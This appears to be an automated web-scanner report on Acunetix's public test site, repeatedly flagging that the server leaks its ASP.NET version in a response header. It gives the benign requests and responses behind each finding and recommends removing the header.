POST http://testaspnet.vulnweb.com/Comments.aspx?id=0
Alert tags Alert description Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).
Other info An attacker can use this information to exploit known vulnerabilities.
Request Request line and header section (413 bytes)
POST http://testaspnet.vulnweb.com/Comments.aspx?id=0 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=0 Content-Length: 1415 Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232Request body (1415 bytes)
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WBB8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fucx8ABRJSZWFkTmV3cy5hc3B4P2lkPTBkAgcPFgIfAQVEU2VhbWxlc3MgT3BlblZBUyBpbnRlZ3JhdGlvbiBub3cgYWxzbyBhdmFpbGFibGUgb24gV2luZG93cyBhbmQgTGludXhkZD0ABLMUBs9bepCq8oSQPQHk%2FTUy&__VIEWSTATEGENERATOR=58A73C4D&__EVENTVALIDATION=%2FwEWWQKDytHbBQKAgcfvBQKFzrr8AQK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ9zWSYY5iwxqgBHXlBfPJ%2F1TT%2FYMA%3D%3D&tbComment=&btnSend=Send+commentResponse Status line and header section (178 bytes)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 0 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 25 Jul 2022 13:05:19 GMTResponse body (0 bytes)
Evidence 2.0.50727Solution Configure the server so it will not return those headers.
POST http://testaspnet.vulnweb.com/Comments.aspx?id=2
Alert tags Alert description Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).
Other info An attacker can use this information to exploit known vulnerabilities.
Request Request line and header section (413 bytes)
POST http://testaspnet.vulnweb.com/Comments.aspx?id=2 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=2 Content-Length: 1721 Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232Request body (1721 bytes)
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WBB8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT8fAAUSUmVhZE5ld3MuYXNweD9pZD0yZAIHDxYCHwEFrAIyMSBKdWx5IDIwMDUgLSBTdGFydC11cCBjb21wYW55IEFjdW5ldGl4IHJlbGVhc2VkIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXI6IGEgdG9vbCB0byBhdXRvbWF0aWNhbGx5IGF1ZGl0IHdlYnNpdGUgc2VjdXJpdHkuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgMiBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUsIGxhdW5jaGVzIHBvcHVsYXIgd2ViIGF0dGFja3MgKFNRTCBJbmplY3Rpb24gZXRjLikgYW5kIGlkZW50aWZpZXMgdnVsbmVyYWJpbGl0aWVzIHRoYXQgbmVlZCB0byBiZSBmaXhlZC5kZLQBJ3hOt3r5jKtYjVFFKdowCSWC&__VIEWSTATEGENERATOR=58A73C4D&__EVENTVALIDATION=%2FwEWWQKpxZClDQKAgcfvBQKFzrr8AQK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ%2Fpbihq93nLJJrCcGURk6iWNCIK%2BA%3D%3D&tbComment=&btnSend=Send+commentResponse Status line and header section (178 bytes)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 0 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 25 Jul 2022 13:05:20 GMTResponse body (0 bytes)
Evidence 2.0.50727Solution Configure the server so it will not return those headers.
POST http://testaspnet.vulnweb.com/Comments.aspx?id=3
Alert tags Alert description Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).
Other info An attacker can use this information to exploit known vulnerabilities.
Request Request line and header section (413 bytes)
POST http://testaspnet.vulnweb.com/Comments.aspx?id=3 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=3 Content-Length: 1539 Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232Request body (1539 bytes)
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WBB8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhHwAFElJlYWROZXdzLmFzcHg%2FaWQ9M2QCBw8WAh8BBagBMjYgSmFudWFyeSAyMDA1IC0gQSBiZXRhIHZlcnNpb24gb2YgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciBoYXMgYmVlbiByZWxlYXNlZCB0b2RheS4gVGhlIGJldGEgaXMgYXZhaWxhYmxlIGZvciBkb3dubG9hZCBhdCBodHRwOi8vd3d3LmFjdW5ldGl4LmNvbS9kb3dubG9hZC8uZGQzP%2FMHHnstJY%2FfWtD4cYSdoYkheQ%3D%3D&__VIEWSTATEGENERATOR=58A73C4D&__EVENTVALIDATION=%2FwEWWQLj8dP9DwKAgcfvBQKFzrr8AQK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ9dpx0P1QE7KvkQnKR4Ij212SQ8lw%3D%3D&tbComment=&btnSend=Send+commentResponse Status line and header section (178 bytes)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 0 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 25 Jul 2022 13:05:20 GMTResponse body (0 bytes)
Evidence 2.0.50727Solution Configure the server so it will not return those headers.
POST http://testaspnet.vulnweb.com/default.aspx
Alert tags Alert description Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).
Other info An attacker can use this information to exploit known vulnerabilities.
Request Request line and header section (388 bytes)
POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com Content-Length: 1025 Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232Request body (1025 bytes)
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8%2F4bzlRmUHIna4LG5&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLpus%2FwCAK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ8DK3Y7%2FBz6vaeG4S8AOaGVC7NUiA%3D%3DResponse Status line and header section (222 bytes)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 25 Jul 2022 13:05:19 GMT Content-Length: 12371Response body (12371 bytes)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8DK3Y7/Bz6vaeG4S8AOaGVC7NUiA==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>Evidence 2.0.50727Solution Configure the server so it will not return those headers.
POST http://testaspnet.vulnweb.com/login.aspx
Alert tags Alert description Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).
Other info An attacker can use this information to exploit known vulnerabilities.
Request Request line and header section (397 bytes)
POST http://testaspnet.vulnweb.com/login.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/login.aspx Content-Length: 1197 Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232Request body (1197 bytes)
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv%2BQ8XadeewSqHhJbH9z4dvJw%3D%3D&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTVALIDATION=%2FwEWWwLoz%2FfGCgLStq24BwK3jsrkBALtuvfLDQKC3IeGDAK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ8xY%2BHkfERpF5ijDSZsRL1CxlmHEA%3D%3D&tbUsername=ZAP&tbPassword=ZAP&cbPersistCookie=on&btnLogin=LoginResponse Status line and header section (222 bytes)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 25 Jul 2022 13:05:19 GMT Content-Length: 13281Response body (13281 bytes)
